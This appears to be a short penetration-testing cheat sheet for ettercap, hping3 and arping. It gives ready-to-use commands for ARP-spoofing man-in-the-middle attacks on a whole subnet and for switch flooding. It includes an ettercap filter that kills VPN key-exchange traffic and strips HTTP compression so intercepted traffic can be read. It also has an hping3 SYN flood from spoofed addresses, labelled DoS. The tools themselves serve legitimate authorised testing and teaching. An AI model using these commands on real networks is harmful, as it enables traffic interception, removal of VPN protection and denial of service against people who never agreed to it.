Ettercap

Ettercap
- Ettercap Commands
- Ettercap Filter
- hping3
- arping

ETTERCAP COMMANDS

Man-in-the-Middle with filter -- <MAC>/<IP>/<PORTS> -- Example: //80,443 = any MACs, any IPs, ports 80 and 443

ettercap.exe -i <INTERFACE> -M arp -Tq -F file.ef <MACs>/<IPs>/<PORTs> <MACs>/<IPs>/<PORTs>

Man-in-the-Middle entire subnet with applied filter

ettercap -T -M arp -F filter.ef // //

Switch flood

ettercap -TP rand_flood

ETTERCAP FILTER

Compile Ettercap filter

etterfilter <ETTER_FILTER> -o out.ef

Sample filter - kills VPN traffic and decodes HTTP traffic

if (ip.proto == UDP && udp.dst == 500){
    drop();
    kill(); 
}
if (ip.src == '<ip>'){
    if (tcp.dst == 80){
        if (search(DATA.data, "Accept-Encoding")){
            replace("Accept-Encoding","Accept-Rubbish!");
            msg("Replaced Encoding\n");
        }
    }
}

HPING3

DoS from spoofed IPs

hping3 <TARGETIP> --flood --frag --spoof <IP> --destport <PORT> --syn

ARPING

ARP scanner

arping <IP_ADDRESS> -I <INTERFACE_NAME> -c <NUMBER_OF_ARPS>

ETTERCAP​

ETTERCAP COMMANDS​

ETTERCAP FILTER​

HPING3​

ARPING​

ETTERCAP

ETTERCAP COMMANDS

ETTERCAP FILTER

HPING3

ARPING